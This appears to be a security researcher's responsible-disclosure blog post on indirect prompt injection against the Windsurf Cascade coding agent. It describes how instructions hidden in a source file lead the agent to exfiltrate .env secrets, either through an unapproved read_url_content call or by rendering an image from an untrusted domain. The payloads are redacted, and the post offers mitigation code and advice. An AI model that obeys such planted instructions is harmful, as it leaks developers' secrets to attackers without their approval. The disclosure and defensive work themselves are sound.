Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets
This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code and the coding agent is called Windsurf Cascade.
The attack vectors we will explore today allow an adversary to exfiltrate data from the developer’s machine via indirect prompt injection.
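These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern: an agent that has access to private data, is exposed to untrusted content, and can communicate externally.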
Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receipt was acknowledged a few days later. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and the departure of the CEO and core team members certainly put Windsurf in the news.
Since Windsurf has been unresponsive and these high-severity vulnerabilities allow the exfiltration of sensitive information from developers, this post will not disclose all technical details and prompt injection payloads. Hopefully, Windsurf will eventually address these deficiencies.
Let’s explore this in detail.
Windsurf System Prompt
When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that could be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.
Here is a snippet of the system prompt:
You can find the Windsurf Cascade system prompt here.
One thing that stood out to me right away was the read_url_content tool.
Attack Vector 1: Tools as Data Exfiltration Vectors
As the name read_url_content suggests, this tool allows Windsurf to connect to a website and read data from it. However, a read capability can also serve as a data exfiltration channel, because the outbound HTTP request itself can carry data. The tool does not require user approval, so an adversary can invoke it during an indirect prompt injection attack without any user confirmation.
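To see why a read-only fetch is enough to leak data, consider the following minimal sketch. The host `attacker.example`, the parameter name `q`, and the secret value are made up for illustration; this is not the redacted payload, and no request is actually sent. It only shows that whatever ends up in the URL is visible to the server that receives the request.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical values, for illustration only.
secret = "API_KEY=abc123"

# A "read" request still sends the full URL to the remote server,
# including anything placed in the query string.
url = "https://attacker.example/page?" + urlencode({"q": secret})

# What the receiving server can recover from the request URL alone.
received = parse_qs(urlsplit(url).query)["q"][0]
print(received)
```

This is why a tool that only "reads" URLs still needs to be treated as an outbound channel when the URL is chosen by the model.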
Exploit Demonstration
The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!
Now, when the developer analyzes the file with Windsurf Cascade, the embedded instructions hijack the AI agent, which then exfiltrates the contents of the .env file using the read_url_content tool.
The above screenshot shows how by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.
Video Demonstration Proof-of-Concept
This video shows how such an exploit chain looks end-to-end:
Prompt Injection Payload
This is the text at the beginning of the source code file:
<redacted for now, as this is not fixed>
With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval.
Attack Vector 2: Image Rendering
The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read the details here.
Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.
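On the defensive side, one way to picture the check is a filter that runs over model output before it is rendered. The sketch below is an assumption-laden illustration, not how Windsurf or VS Code implement it: the allow list `TRUSTED_IMAGE_HOSTS` and the function `untrusted_image_urls` are hypothetical names, and the regular expression only covers the common inline Markdown image syntax.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allow list; a real product would make this configurable.
TRUSTED_IMAGE_HOSTS = frozenset({"example.com"})

# Matches inline Markdown images: ![alt](url) or ![alt](url "title").
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def untrusted_image_urls(markdown: str) -> list[str]:
    """Return image URLs that point at a host outside the allow list."""
    flagged = []
    for match in IMAGE_PATTERN.finditer(markdown):
        url = match.group(1)
        host = urlsplit(url).hostname
        if host is None:
            # Relative paths have no host and trigger no third-party request.
            continue
        if host not in TRUSTED_IMAGE_HOSTS:
            flagged.append(url)
    return flagged
```

A renderer could refuse to load, or replace with plain text, any image whose URL this function returns. Reference-style images and raw HTML `<img>` tags are not handled here and would need their own checks.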
Exploit Demonstration
As we have shown with many similar attacks, this does not require a human in the loop: data leaks as soon as the application renders an image from an untrusted domain.
To keep this post short, the following screenshot shows the end-to-end exploit chain:
This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.
Video Demonstration Proof-of-Concept
Prompt Injection Payload
This is the text at the beginning of the source code file:
<redacted for now, as this is not fixed>
That’s all that was needed to hijack Windsurf Cascade.
Responsible Disclosure
These vulnerabilities were disclosed to Windsurf on May 30, 2025, and receipt was acknowledged by Windsurf a few days later. However, all further inquiries about triage, bug status, or fixes remain unanswered.
Hence, disclosing this publicly after three months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.
Mitigations
- Require a human-in-the-loop before invoking the read_url_content tool with untrusted servers
  - Consider an allow-list of trusted domains that can be read from securely without user approval
- Do not render images/hyperlinks to untrusted domains. VS Code has an allow list of trusted domains, so it might be best to integrate with that feature
- Also, do not automatically navigate to clickable hyperlinks (e.g. phishing attacks)
- If you are a customer of Windsurf, I suggest reaching out to your account manager to inquire about these high-severity vulnerabilities to raise awareness and get them fixed
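The first mitigation can be sketched as a small gate that runs before any URL-reading tool call. This is a hedged illustration only: `needs_user_approval` and `TRUSTED_READ_HOSTS` are hypothetical names, the allow-listed host is an arbitrary example, and nothing here reflects Windsurf’s actual tool-invocation code.

```python
from urllib.parse import urlsplit

# Hypothetical allow list of hosts that may be read without asking the user.
TRUSTED_READ_HOSTS = frozenset({"docs.python.org"})


def needs_user_approval(url: str, trusted_hosts: frozenset = TRUSTED_READ_HOSTS) -> bool:
    """Return True unless the URL is HTTPS and its exact host is allow-listed."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return True
    host = parts.hostname
    # Exact match only, so "docs.python.org.attacker.example" is not trusted.
    return host is None or host not in trusted_hosts
```

For example, `needs_user_approval("https://docs.python.org/3/")` returns `False`, while a URL on any other host, or a plain `http://` URL, returns `True` and would be routed to a confirmation prompt. Matching the exact host rather than a substring or suffix avoids look-alike domains slipping through.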
Conclusion
Windsurf Cascade is vulnerable to prompt injection, and since there is no deterministic fix for prompt injection itself, security has to be enforced downstream of the LLM output.
As demonstrated, weaknesses in tool invocation and image rendering allow a third-party attacker to embed malicious instructions into source code, websites, or even through RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy”, potentially leading to data exfiltration.